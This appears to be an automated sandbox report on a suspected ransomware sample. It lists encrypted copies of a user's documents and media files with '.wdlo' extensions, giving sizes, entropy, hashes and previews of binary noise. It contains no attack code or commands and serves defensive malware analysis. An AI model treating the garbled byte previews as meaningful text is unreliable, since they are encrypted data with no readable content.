                  Preview:PWZOQ...s..r...Kk1.h.[.7F.@...d=1.<.K....;.'..'..?.]&u.,D._.-./o.Z?y....G..2....'X8.i..%-`.n..0.$.3..&v{s6.q..<..,#W>6..N.....=.1.-..<..=.8..g0SM..lI...M^j...Z,#..q\.Z..#.1...#u...~C..K.Oq...p.^'.R..=../.F.B9..C4..\.@......K..g2.P.n.I..N.$.8..;K[....i.'...=..?.O.;$.*J..;;7;....&..cV.}...}0..'.m....c.yOM.R..)Z.|..r......j.h...I.y...`....?/)Y.lu.`l.4.^c...,.......U..b%j.'n...m..)/vM..M....d.V>d..@..C)94_.s...pV..^x..W.p...'...m...7..*.t....c..."....N.4.....V....)G.-..RMc.k..QO..V..=.....LnV3...0+0..T.Nw.;.|.E...Q.C..-..4.......:G..t.k.>...[.7.[9.>......LG.x<....x.x.X...J.5.R..%.K.p.....j...?.n.k?.KY ....,U.....v...\x.x..[...m.."......'....uCU....Q1.Q....p...p.dg..%..y.K..|....*{....."CX6g.|-...;a...0.......).BE.....E.L......e.x..._2..+.9.(;.....j.6T.5..q..Z.zr5H.._.'z..U%.-...W.T=.......V.>.....4Wm.{..&..H..ko..|j.wJ.e.BM..e......Z...N...w.....r.$...ci..@T./.fp....d].7dt..D.U..57m..p#.{.?..|.#...=D.........(.x73...jq*n..].).w.#...".$k..

                  C:\Users\user\Downloads\QFAPOWPAFG.pdf

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.8528182985834825
                  Encrypted:false
                  SSDEEP:24:p/GLeFy0CUx4434oYpad7Emeu0J+IzidjEdPPaO7G7DSoVQVLoS+8W5pTvrx3zbD:p/CeFy7DMsad7euuHzidybGPsdoS65pV
                  MD5:6AEB343F07F652F9B2BEDC16C2B4BE19
                  SHA1:D53A79BEE427AA443225E81950EC84014A66535A
                  SHA-256:F6FA242C0FCF90E1C93DA5F4ED176D0762977D864E895AE1CD16ECCE50841388
                  SHA-512:F46389A290F3F3B27E3E24A172DFC2F3DD1AF016984B51EE5BA54E8EEF884272FA89751DF1D47A72D88445357E1D3A4892A34A296ECF57CCCE3683D990609195
                  Malicious:false
                  Preview:QFAPO.SN#..]?.......;..z.(.......0..O..k!...~y]...7.q....~}4r.W.0.nF...X...+....&...B....R...,.3.T..........@.e...V..x.,..l..n...=X8....F..Wl..$.xb|'VI..cqe..NJ.i../|.]Vp.*....VO.....*k.F..-..g<.........u.jk^...Au.o.|.....DF..u.....'..DO.....#...'P....M..f:o..$I..Qb..%.qz.....9..0..././.....A..So.Q.....dl...3.5..+.....n.(.@:./....Pw._P.0...=..*eS..3|R..F&.$g.&K.u........,........O.?f.9..-....=S.......R...`..y..D..Ir\.......5........!";.B.>..L.Z.\.<e'.[]%.>..j.>.I..|-........~....r"-.T\g..I...Zq30l4.f[..m/v......$=..$Ncn%........$w.Xr1......g.ipN..y.l.K..P.8..4..R..X..1..%.;<).~|}.u.....G...A....q.*.#5..[F..Y.CEa(.......1..*R.....uB..]K....v..c}rM......N@..h;[..p...;..m............E.fGr.==H......C..B-.r..)....&.w..|..W7U.op....:.D.8..t.....p.j....N$.}...){0...8.........u.zs%.._P.y..r..)..`<...r..Qr./.........H...c.e..l......).h.\...<.X.S _....Fi)U.'.&...H..US..d..i..8.1qW.r......lYE.F|_..{.Vq.......C.,C6...$.*...9.0...k..T..&.........s.O.....u.

                  C:\Users\user\Downloads\QFAPOWPAFG.pdf.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.8528182985834825
                  Encrypted:false
                  SSDEEP:24:p/GLeFy0CUx4434oYpad7Emeu0J+IzidjEdPPaO7G7DSoVQVLoS+8W5pTvrx3zbD:p/CeFy7DMsad7euuHzidybGPsdoS65pV
                  MD5:6AEB343F07F652F9B2BEDC16C2B4BE19
                  SHA1:D53A79BEE427AA443225E81950EC84014A66535A
                  SHA-256:F6FA242C0FCF90E1C93DA5F4ED176D0762977D864E895AE1CD16ECCE50841388
                  SHA-512:F46389A290F3F3B27E3E24A172DFC2F3DD1AF016984B51EE5BA54E8EEF884272FA89751DF1D47A72D88445357E1D3A4892A34A296ECF57CCCE3683D990609195
                  Malicious:false
                  Preview:QFAPO.SN#..]?.......;..z.(.......0..O..k!...~y]...7.q....~}4r.W.0.nF...X...+....&...B....R...,.3.T..........@.e...V..x.,..l..n...=X8....F..Wl..$.xb|'VI..cqe..NJ.i../|.]Vp.*....VO.....*k.F..-..g<.........u.jk^...Au.o.|.....DF..u.....'..DO.....#...'P....M..f:o..$I..Qb..%.qz.....9..0..././.....A..So.Q.....dl...3.5..+.....n.(.@:./....Pw._P.0...=..*eS..3|R..F&.$g.&K.u........,........O.?f.9..-....=S.......R...`..y..D..Ir\.......5........!";.B.>..L.Z.\.<e'.[]%.>..j.>.I..|-........~....r"-.T\g..I...Zq30l4.f[..m/v......$=..$Ncn%........$w.Xr1......g.ipN..y.l.K..P.8..4..R..X..1..%.;<).~|}.u.....G...A....q.*.#5..[F..Y.CEa(.......1..*R.....uB..]K....v..c}rM......N@..h;[..p...;..m............E.fGr.==H......C..B-.r..)....&.w..|..W7U.op....:.D.8..t.....p.j....N$.}...){0...8.........u.zs%.._P.y..r..)..`<...r..Qr./.........H...c.e..l......).h.\...<.X.S _....Fi)U.'.&...H..US..d..i..8.1qW.r......lYE.F|_..{.Vq.......C.,C6...$.*...9.0...k..T..&.........s.O.....u.

                  C:\Users\user\Downloads\SNIPGPPREP.png

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.834836536959116
                  Encrypted:false
                  SSDEEP:24:C7WSqcxqJgmEPzErjQHqKERUJ0lFGpwvivOBku1TyRbyXvGUXNaisdxVhHreH3zX:2q1dELErsHq1lYOviXudyCvGiNPKxVhe
                  MD5:11CF8AD294B7B676DC737ABA80B96AEC
                  SHA1:AE9C3329A6D03702DD258AA737619791D5B32BED
                  SHA-256:3E0D330F226DF497AF4EED4D41FB317A629F40554B2C1642D70167668183CD27
                  SHA-512:C7A2DE6FA4FFB1CC3F1899281EAA60F77F495980183318EC15465C9098B6465C00127CCEC42CFE9BB88F4E7DAFD55210C1451E0CF2839701D21DCA5502938B47
                  Malicious:false
                  Preview:SNIPGu2.....wl:M...F.>.......9..?..t]...C....].K...7.......Mv....ZL=.M....;........>..&..)7.0.;......?._..G...I.u}nnv/..3..SF[fJg.#.N<U.qn.m.*/S..@o.R..gR.+.jFK.........#...-1..R..+.J........I...>}..q.Q.Xu}.r.y,)...%..(HL{!.{a/...]0.3K.I.;..^.d_.......].R.z.W.,<.7..I.._S...`.u...$.a..$:%P....m...#+......,...=......a0....M...wz.|.N#=.....c...g...R..v.%...r...k.Xh..7.34 a..*....i....7........ze....7ST.)..Y.J.E...&..4.u.F*Tf.'0g3j.W....0v..\...,.....nw..6H...R..T..]..!..~....Q.f2.....V..;..Wt.Ym.G...1......0.`..tQ..pc..|$.....T.eBqa...9....a&{.....j...?P....+.X..n..hLBR......I.....q..N.?...h..P)Q....Q...m;i..q....I.......q...@w2.....+.^H.a..(..w...!.a6i......'yf^'...M.\>.......v....p+..^.m..0{.\............|...l....v@....g.).../..o.....i.O...gR...q................h..I4.n...Q...~...~2..ba.]2..-]P......].(...S*[...w....Da...(..o...}-....-Q ..F.....T?...w...._.$^.....1..aUd)....FDxG.....P..fcZ..6.../...I..@O.Y..[..$;ef......\..I.Z^l.QU..wH..,@"

                  C:\Users\user\Downloads\SNIPGPPREP.png.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.834836536959116
                  Encrypted:false
                  SSDEEP:24:C7WSqcxqJgmEPzErjQHqKERUJ0lFGpwvivOBku1TyRbyXvGUXNaisdxVhHreH3zX:2q1dELErsHq1lYOviXudyCvGiNPKxVhe
                  MD5:11CF8AD294B7B676DC737ABA80B96AEC
                  SHA1:AE9C3329A6D03702DD258AA737619791D5B32BED
                  SHA-256:3E0D330F226DF497AF4EED4D41FB317A629F40554B2C1642D70167668183CD27
                  SHA-512:C7A2DE6FA4FFB1CC3F1899281EAA60F77F495980183318EC15465C9098B6465C00127CCEC42CFE9BB88F4E7DAFD55210C1451E0CF2839701D21DCA5502938B47
                  Malicious:false
                  Preview:SNIPGu2.....wl:M...F.>.......9..?..t]...C....].K...7.......Mv....ZL=.M....;........>..&..)7.0.;......?._..G...I.u}nnv/..3..SF[fJg.#.N<U.qn.m.*/S..@o.R..gR.+.jFK.........#...-1..R..+.J........I...>}..q.Q.Xu}.r.y,)...%..(HL{!.{a/...]0.3K.I.;..^.d_.......].R.z.W.,<.7..I.._S...`.u...$.a..$:%P....m...#+......,...=......a0....M...wz.|.N#=.....c...g...R..v.%...r...k.Xh..7.34 a..*....i....7........ze....7ST.)..Y.J.E...&..4.u.F*Tf.'0g3j.W....0v..\...,.....nw..6H...R..T..]..!..~....Q.f2.....V..;..Wt.Ym.G...1......0.`..tQ..pc..|$.....T.eBqa...9....a&{.....j...?P....+.X..n..hLBR......I.....q..N.?...h..P)Q....Q...m;i..q....I.......q...@w2.....+.^H.a..(..w...!.a6i......'yf^'...M.\>.......v....p+..^.m..0{.\............|...l....v@....g.).../..o.....i.O...gR...q................h..I4.n...Q...~...~2..ba.]2..-]P......].(...S*[...w....Da...(..o...}-....-Q ..F.....T?...w...._.$^.....1..aUd)....FDxG.....P..fcZ..6.../...I..@O.Y..[..$;ef......\..I.Z^l.QU..wH..,@"

                  C:\Users\user\Downloads\UNKRLCVOHV.docx

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.846660639104775
                  Encrypted:false
                  SSDEEP:24:+W9aUWAMArnNc+Sk1q4KhE72DpkGyYZ13p0ZBTHM8xav6QeS98Wjlf/3zbD:+U3rK+X1rKhlporqC89t13nD
                  MD5:CA2BA80F7499B90053B36613C3147C48
                  SHA1:09FB3B6401E5F8DEBBCCE61ABBA3EDC90B3EC2F1
                  SHA-256:346899E4BD4EDE80ECBFBF09157CA35C1F67D17CC1BDB7C92F0FE16E3C01A936
                  SHA-512:75C03611E181ADF9C5F2827AA41835D2ABE2AE9B57DC0D526DB9319829FBB279D00EF5732D201C78A58A9C1E9F682D3503E138006C9F6A656E1CF23B1CBE32D6
                  Malicious:false
                  Preview:UNKRL.A.,*.r.>.7Sx...>#...}..EoVb.F...nR....v........~('..E.2...}I........f.....5.......&.D....}}......Aj.Y.UfN%.gm...eo......rK).m.|. ...GVq......k},..l..M.Zk I.I^...e.....G..F..%N.^.*....E..ZN...W.?....p.Q...?..j..I..m...:....8.?.~.........Z;.\]"d.xr...]|.b77.....i.YR......b.I......;...\^....Wc..'.-<..c.... ..IZ.U44...~....R1.........m.<\Y.gx#k....tG.....<.bo.Jc.?.g.J.S..aW....rD.*k....2.Y;..:.E4.5.#)..(quUa..V....e..*..;r.O.D...9*....oy...g!9@G...6..&...E...Mw.~..G.LG.@..>z.B..C..L).S..,...O.*....R...Y:4.[).zFd....y....:.({U..fl._..@C.|W.k.C...'.....1U...m.gt...4...c..A0..7..d+......N.UB...{.z....Y.k(8...\.9.d..,~D......T..0...X.....;N.=.<.D.....l.t}."......._l....'..`...B.YD..9..y.."8`e.&.....oB....y"....r|._....~...K..Z..~.:...`.R..$....9.}......!...Z....?|I..-........>u..U.+..xY..+..$.4...a..%..U.b...o....:.!.T..H...k...U...sZn.......J8G)...fd.".9...e.A..+b..)nq...r...3.f...=..|..8L....|a.iA%+......^.tbO......hq.Sr]...ZI..JVuu.^.....2

                  C:\Users\user\Downloads\UNKRLCVOHV.docx.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.846660639104775
                  Encrypted:false
                  SSDEEP:24:+W9aUWAMArnNc+Sk1q4KhE72DpkGyYZ13p0ZBTHM8xav6QeS98Wjlf/3zbD:+U3rK+X1rKhlporqC89t13nD
                  MD5:CA2BA80F7499B90053B36613C3147C48
                  SHA1:09FB3B6401E5F8DEBBCCE61ABBA3EDC90B3EC2F1
                  SHA-256:346899E4BD4EDE80ECBFBF09157CA35C1F67D17CC1BDB7C92F0FE16E3C01A936
                  SHA-512:75C03611E181ADF9C5F2827AA41835D2ABE2AE9B57DC0D526DB9319829FBB279D00EF5732D201C78A58A9C1E9F682D3503E138006C9F6A656E1CF23B1CBE32D6
                  Malicious:false
                  Preview:UNKRL.A.,*.r.>.7Sx...>#...}..EoVb.F...nR....v........~('..E.2...}I........f.....5.......&.D....}}......Aj.Y.UfN%.gm...eo......rK).m.|. ...GVq......k},..l..M.Zk I.I^...e.....G..F..%N.^.*....E..ZN...W.?....p.Q...?..j..I..m...:....8.?.~.........Z;.\]"d.xr...]|.b77.....i.YR......b.I......;...\^....Wc..'.-<..c.... ..IZ.U44...~....R1.........m.<\Y.gx#k....tG.....<.bo.Jc.?.g.J.S..aW....rD.*k....2.Y;..:.E4.5.#)..(quUa..V....e..*..;r.O.D...9*....oy...g!9@G...6..&...E...Mw.~..G.LG.@..>z.B..C..L).S..,...O.*....R...Y:4.[).zFd....y....:.({U..fl._..@C.|W.k.C...'.....1U...m.gt...4...c..A0..7..d+......N.UB...{.z....Y.k(8...\.9.d..,~D......T..0...X.....;N.=.<.D.....l.t}."......._l....'..`...B.YD..9..y.."8`e.&.....oB....y"....r|._....~...K..Z..~.:...`.R..$....9.}......!...Z....?|I..-........>u..U.+..xY..+..$.4...a..%..U.b...o....:.!.T..H...k...U...sZn.......J8G)...fd.".9...e.A..+b..)nq...r...3.f...=..|..8L....|a.iA%+......^.tbO......hq.Sr]...ZI..JVuu.^.....2

                  C:\Users\user\Downloads\UNKRLCVOHV.xlsx

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.855987584236188
                  Encrypted:false
                  SSDEEP:24:ZnTNwGaZ+J5+QXU/rROj3mD81wx6+FLELBQarcsRCfhpqX3zbD:ZhaZ+J9E/rROj3mDgwiLBQzsQpqX3nD
                  MD5:ED581161814979C11C9FBB7850DC4BC0
                  SHA1:433B623F875A22C5F37C211A2F582024AE41BFD2
                  SHA-256:7DF2B2CC3B9E26684A8127E445F1B0855D957C8A916331451EF17C8C9BD68F19
                  SHA-512:BD6DA485A9F9E3B429A357547E1623A8BBA8035ECCEE875461C6F61F87B98FB947655292A197CB3558B444EFE08A0EC719628E8B3A2D8DCBE6D6C07640738F67
                  Malicious:false
                  Preview:UNKRL...3-..&"a..B.r[...O:...Y... .l...5kW.Q.d.%5..F.F!t).Q...-.....J...*.......q.r.....Wp........5.../'Z.......!.q.<..G.X.J..D.o@.EPL.xV?.),.K..c...{.Q....SL...M"....1^...2.}.9T.....Nz/i..nb.z`.c..JU..R...^0VS..vWC.=a.!.<$....;s].b.F......`.{Vk.Im......$.].1.)!`O.r....d..;.1.........*)rx.U..&..=.}.)$.....B%~.b',.Z" .[k.....9.a6....nx........_.kq>...v..&.|\W...k. .?_.<Yg./.{....m.r..r....'..'[.Z7.}....&...g....W..Y....}>.ZkZ%.%A.%.t.<ai2#:."......#......1..t...,Vn.....@U=<5.....$ "..C..2.h.#..w.,h.C.1.#\...q{.i.4tI..>G......D.n.`.a..........VP.{..[d.o.&,..E......!......Zt...b....@.3....|.V.P.C..jd.vx8............J.R.U.S....E.uQ}.....-..AG...$Q..~...C^...e.9H.qK=..@...2Q.......s.....).[.tv.3s..H8.<..7OI.|i..o... .,C...6..S4.%C.....e..P......a...`.YU...}].d..j....C.......8a...>.KE.SG.o[....H..S..B"|..^....`Q!...4.6k....u....+O.n....:..h...`..,?.Xm.t....R<...@..[...A...~.8.. .^...s......O..3......W..9..$+.)x.J+...L[x..t...;..Zr...-Ta".Yd

                  C:\Users\user\Downloads\UNKRLCVOHV.xlsx.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.855987584236188
                  Encrypted:false
                  SSDEEP:24:ZnTNwGaZ+J5+QXU/rROj3mD81wx6+FLELBQarcsRCfhpqX3zbD:ZhaZ+J9E/rROj3mDgwiLBQzsQpqX3nD
                  MD5:ED581161814979C11C9FBB7850DC4BC0
                  SHA1:433B623F875A22C5F37C211A2F582024AE41BFD2
                  SHA-256:7DF2B2CC3B9E26684A8127E445F1B0855D957C8A916331451EF17C8C9BD68F19
                  SHA-512:BD6DA485A9F9E3B429A357547E1623A8BBA8035ECCEE875461C6F61F87B98FB947655292A197CB3558B444EFE08A0EC719628E8B3A2D8DCBE6D6C07640738F67
                  Malicious:false
                  Preview:UNKRL...3-..&"a..B.r[...O:...Y... .l...5kW.Q.d.%5..F.F!t).Q...-.....J...*.......q.r.....Wp........5.../'Z.......!.q.<..G.X.J..D.o@.EPL.xV?.),.K..c...{.Q....SL...M"....1^...2.}.9T.....Nz/i..nb.z`.c..JU..R...^0VS..vWC.=a.!.<$....;s].b.F......`.{Vk.Im......$.].1.)!`O.r....d..;.1.........*)rx.U..&..=.}.)$.....B%~.b',.Z" .[k.....9.a6....nx........_.kq>...v..&.|\W...k. .?_.<Yg./.{....m.r..r....'..'[.Z7.}....&...g....W..Y....}>.ZkZ%.%A.%.t.<ai2#:."......#......1..t...,Vn.....@U=<5.....$ "..C..2.h.#..w.,h.C.1.#\...q{.i.4tI..>G......D.n.`.a..........VP.{..[d.o.&,..E......!......Zt...b....@.3....|.V.P.C..jd.vx8............J.R.U.S....E.uQ}.....-..AG...$Q..~...C^...e.9H.qK=..@...2Q.......s.....).[.tv.3s..H8.<..7OI.|i..o... .,C...6..S4.%C.....e..P......a...`.YU...}].d..j....C.......8a...>.KE.SG.o[....H..S..B"|..^....`Q!...4.6k....u....+O.n....:..h...`..,?.Xm.t....R<...@..[...A...~.8.. .^...s......O..3......W..9..$+.)x.J+...L[x..t...;..Zr...-Ta".Yd

                  C:\Users\user\Downloads\WHZAGPPPLA.mp3

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.846579019083689
                  Encrypted:false
                  SSDEEP:24:LxgtpsijTv4i1CXzhbKNB8fKZN9PXYEdF2E6MdH6DBaWeGbeJx0JwFaxa3zbD:itpsijTv3CpKNCKZvPXYEeTBaHG8mJF+
                  MD5:92F482F75BD38508E51C0A3DB6FFF65B
                  SHA1:20EF632B8337E74A74A755AB6A813EF3492E3B61
                  SHA-256:DDBA3DE8F07AEF037A55746042304A75A43767B464188E83CCFB4166D6C1FF8A
                  SHA-512:0ACBCA6929C1CCFA47D7844AEE8F706611A0D7C7D0AF8AE31DD05A7EBDA2007878A515D85B0BFBA4F4BAB12593732C8CD05B11FF65F5557432691C57DAF6C611
                  Malicious:false
                  Preview:WHZAG3.~?......I.c.K}= .td..Gu..F............&F.)...e`D:.6..e?.N@`#..:..r...>DfD..Vcc,._^yU.z....M..uM.~H(?U.k....>#H.R..%..W..%...@k.sP.0.R..KD........V.cM&.Q.|.)C..,..d.......%.x......3XZ..QN3F...h.h..1.luP!..+p-U.j....0.'l.........j......t,.....d..g}Z..;.{.;.......1...F.'...=\.c..%(.....~7./..$..Le6{..D.A...G....._J..z.......u.t._........ ..".?...C.......c......2.........)...H..4.|#..6.'.OfJ..dcu)..6..x-..->x.t../E.j[I<]...l..q....p....w.....t0..[.....2..Cb..k.+G....8.`=...k.......9&.T.M.1..s....4?..IKk........H....c..BB.V....Rt.p".R.v.]..0&1.^J&....1;.....~.h.-.5GFI-.?...]1..p.)......tN.tK...Dk......3.Mg..b.F...t.}.VF.....W\...rJ.=.r..TB....*...$.1....f..AKj...K....F..Rmt._.b..#.....X.y.A.....I....J.4.?........M...l..f....L.<.........-..d:./bk.?....v....kV.}))..F}Nb...S....m..........rk..2F.....r..61...3rp.gL....l..9.....s.@.5g.a.....0.@:.G..z_.h..t....u].?%P. .N.?..|.{.......Zw.F3FU.n.0.....L..E.|......8...r{T..5...'J."le.p.K`....NF

                  C:\Users\user\Downloads\WHZAGPPPLA.mp3.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.846579019083689
                  Encrypted:false
                  SSDEEP:24:LxgtpsijTv4i1CXzhbKNB8fKZN9PXYEdF2E6MdH6DBaWeGbeJx0JwFaxa3zbD:itpsijTv3CpKNCKZvPXYEeTBaHG8mJF+
                  MD5:92F482F75BD38508E51C0A3DB6FFF65B
                  SHA1:20EF632B8337E74A74A755AB6A813EF3492E3B61
                  SHA-256:DDBA3DE8F07AEF037A55746042304A75A43767B464188E83CCFB4166D6C1FF8A
                  SHA-512:0ACBCA6929C1CCFA47D7844AEE8F706611A0D7C7D0AF8AE31DD05A7EBDA2007878A515D85B0BFBA4F4BAB12593732C8CD05B11FF65F5557432691C57DAF6C611
                  Malicious:false
                  Preview:WHZAG3.~?......I.c.K}= .td..Gu..F............&F.)...e`D:.6..e?.N@`#..:..r...>DfD..Vcc,._^yU.z....M..uM.~H(?U.k....>#H.R..%..W..%...@k.sP.0.R..KD........V.cM&.Q.|.)C..,..d.......%.x......3XZ..QN3F...h.h..1.luP!..+p-U.j....0.'l.........j......t,.....d..g}Z..;.{.;.......1...F.'...=\.c..%(.....~7./..$..Le6{..D.A...G....._J..z.......u.t._........ ..".?...C.......c......2.........)...H..4.|#..6.'.OfJ..dcu)..6..x-..->x.t../E.j[I<]...l..q....p....w.....t0..[.....2..Cb..k.+G....8.`=...k.......9&.T.M.1..s....4?..IKk........H....c..BB.V....Rt.p".R.v.]..0&1.^J&....1;.....~.h.-.5GFI-.?...]1..p.)......tN.tK...Dk......3.Mg..b.F...t.}.VF.....W\...rJ.=.r..TB....*...$.1....f..AKj...K....F..Rmt._.b..#.....X.y.A.....I....J.4.?........M...l..f....L.<.........-..d:./bk.?....v....kV.}))..F}Nb...S....m..........rk..2F.....r..61...3rp.gL....l..9.....s.@.5g.a.....0.@:.G..z_.h..t....u].?%P. .N.?..|.{.......Zw.F3FU.n.0.....L..E.|......8...r{T..5...'J."le.p.K`....NF

                  C:\Users\user\Downloads\WSHEJMDVQC.jpg

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.828723999862843
                  Encrypted:false
                  SSDEEP:24:lO7y/yba9ICinmSARGf92rKmNzQEuI0CjYtH9tt+7YrU3zbD:oy/QdrnmSAA9VmNzpumctHHt+ErU3nD
                  MD5:020841A828FF858C6F86196DDAE20AEE
                  SHA1:F5BB2F23C24525D757CDA1882DEE564B4244B0CA
                  SHA-256:95EE407B1C9D528DAAB56993FFC0945A737A5487A27757D6B143C10068E8B51E
                  SHA-512:410E101C9D08E24EE4E1DA1A40B005874E11C50053762ADF4320AE0DA33B071ED384CA7873C5B03279E21DCEAAB0EC735C1DF536021814A2C8F6FE3F93C12C3A
                  Malicious:false
                  Preview:WSHEJ..L-`.8t......!.>...-.....R..2.Ti-F.....,...*N._ ...m... 4._..x....C.I..].cA..Kht]..G.!.q..mJ..a.t.nA..tr.&.&.{8..1?..A7.99..........F1.K5.\....J...E.?.G..+..1...{L\.(...ge[..vl,.I..=..2T4p...%.:e $...#F{P./..7p.z.Sj3.FP.3..G...}ty~...cy~#.K......(.S...e.o...q0K......t......l.^.+w.......ga..J..$..p.6..Fz@...../.OF.s...S.H.Z...B..>..7.*.N..F9U...w..i....^.F ?9.J6C.I8w..b.#.'.9.,&_c..........h..=..=.....Qg._W.E..M.).S..AN...-,E:Q.......'.......e."cQ.....!-......6...[............5..4..?5.#j(.a##.7.:..eC+6..U{.....E?.a.[H...H.....V.....n8bD.X.K;.gF.....;....D....1].....\G.S.e.n..?....i.@8%...'V..tL..$.BA.7s)[&.J...fZ.@3.i7.A..[[p..8......A.H.........3....V.0.!..i..Zw.1..7....|.r.iN.H.4.J:yGF...?V{...w....Q..=N]n.=...+.?x.+n...V.P.R.Q\O!..,......b..4w....v....B..no..o....Q............8..I?....}..{..1:.<D......|.....-..B#a....*..U.F0....UD.N..M.]n....2.i...L.<g..I....q66...hq.:{..}.{...|.)......=.......G....!G9....x.I{<..l+...@....1.j..

                  C:\Users\user\Downloads\WSHEJMDVQC.jpg.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.828723999862843
                  Encrypted:false
                  SSDEEP:24:lO7y/yba9ICinmSARGf92rKmNzQEuI0CjYtH9tt+7YrU3zbD:oy/QdrnmSAA9VmNzpumctHHt+ErU3nD
                  MD5:020841A828FF858C6F86196DDAE20AEE
                  SHA1:F5BB2F23C24525D757CDA1882DEE564B4244B0CA
                  SHA-256:95EE407B1C9D528DAAB56993FFC0945A737A5487A27757D6B143C10068E8B51E
                  SHA-512:410E101C9D08E24EE4E1DA1A40B005874E11C50053762ADF4320AE0DA33B071ED384CA7873C5B03279E21DCEAAB0EC735C1DF536021814A2C8F6FE3F93C12C3A
                  Malicious:false
                  Preview:WSHEJ..L-`.8t......!.>...-.....R..2.Ti-F.....,...*N._ ...m... 4._..x....C.I..].cA..Kht]..G.!.q..mJ..a.t.nA..tr.&.&.{8..1?..A7.99..........F1.K5.\....J...E.?.G..+..1...{L\.(...ge[..vl,.I..=..2T4p...%.:e $...#F{P./..7p.z.Sj3.FP.3..G...}ty~...cy~#.K......(.S...e.o...q0K......t......l.^.+w.......ga..J..$..p.6..Fz@...../.OF.s...S.H.Z...B..>..7.*.N..F9U...w..i....^.F ?9.J6C.I8w..b.#.'.9.,&_c..........h..=..=.....Qg._W.E..M.).S..AN...-,E:Q.......'.......e."cQ.....!-......6...[............5..4..?5.#j(.a##.7.:..eC+6..U{.....E?.a.[H...H.....V.....n8bD.X.K;.gF.....;....D....1].....\G.S.e.n..?....i.@8%...'V..tL..$.BA.7s)[&.J...fZ.@3.i7.A..[[p..8......A.H.........3....V.0.!..i..Zw.1..7....|.r.iN.H.4.J:yGF...?V{...w....Q..=N]n.=...+.?x.+n...V.P.R.Q\O!..,......b..4w....v....B..no..o....Q............8..I?....}..{..1:.<D......|.....-..B#a....*..U.F0....UD.N..M.]n....2.i...L.<g..I....q66...hq.:{..}.{...|.)......=.......G....!G9....x.I{<..l+...@....1.j..

                  C:\Users\user\Downloads\WSHEJMDVQC.xlsx

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.842319938880276
                  Encrypted:false
                  SSDEEP:24:skUT2iFrpesE5KGdU1Ip5dOX8W4+jcHgSDWn/rQ3N+KaAkCD3zbD:k2lsE0Gm1IPw3slSnkd+PAD3nD
                  MD5:3EC820B123F05E687E4C3E1748E07219
                  SHA1:F9969A5FA299440F1D667FE50391BFA4BFA64F6A
                  SHA-256:EEBD7803369FE7EFD531845F4673A9CE5709B799F69686384A4A64AF7330601C
                  SHA-512:3B8131796D4D6541D69D83819641701CE2075A84E605092601518873FEC67D7335BDC7F710608773ECB45E2EE36987B4819B369C38DE38B34572C859C5FE7C80
                  Malicious:false
                  Preview:WSHEJ.a...2....#Rz.A......o".-._.~.aG}T.h#c.B..:B....,.7....6...o.Lz..9;k.8....P..=.B..'.A..=....q..q...}.I.<K?...`..A...d.....L.W.O?..Z}ra..?...=@.ca}|.d#.......ve...c....].~.....+.-7(G.e_@.N... .J.W.. +.+.......I.3.HVO...u.OS......4.........hhx......Hx...;..V}.Ih..3..".2.....1).Td.#TO..9.,.nB`.....6...Lp..bp(..v......b.N...Q.Qj*oCR......#...(..7.g2h.+ ;G.br..r...)M?C...`O.N.....a...Jel...b..g....mO.J.(OX.;.... ..IL....@!.L.>...R:...z{..a..IR.X..l.5..-.;.U..F...9...^/ ..g..h.J....M.%K..PC.$..~. .E.].....3.|..H.... @F]=.#.`p....N..!.'..B.5.b..e.....,.K......M d.k.....2..h.t..s.i..".u..G.8..U...i.o.J....qp.?..@...W.X;....<.....b..).&.*...B 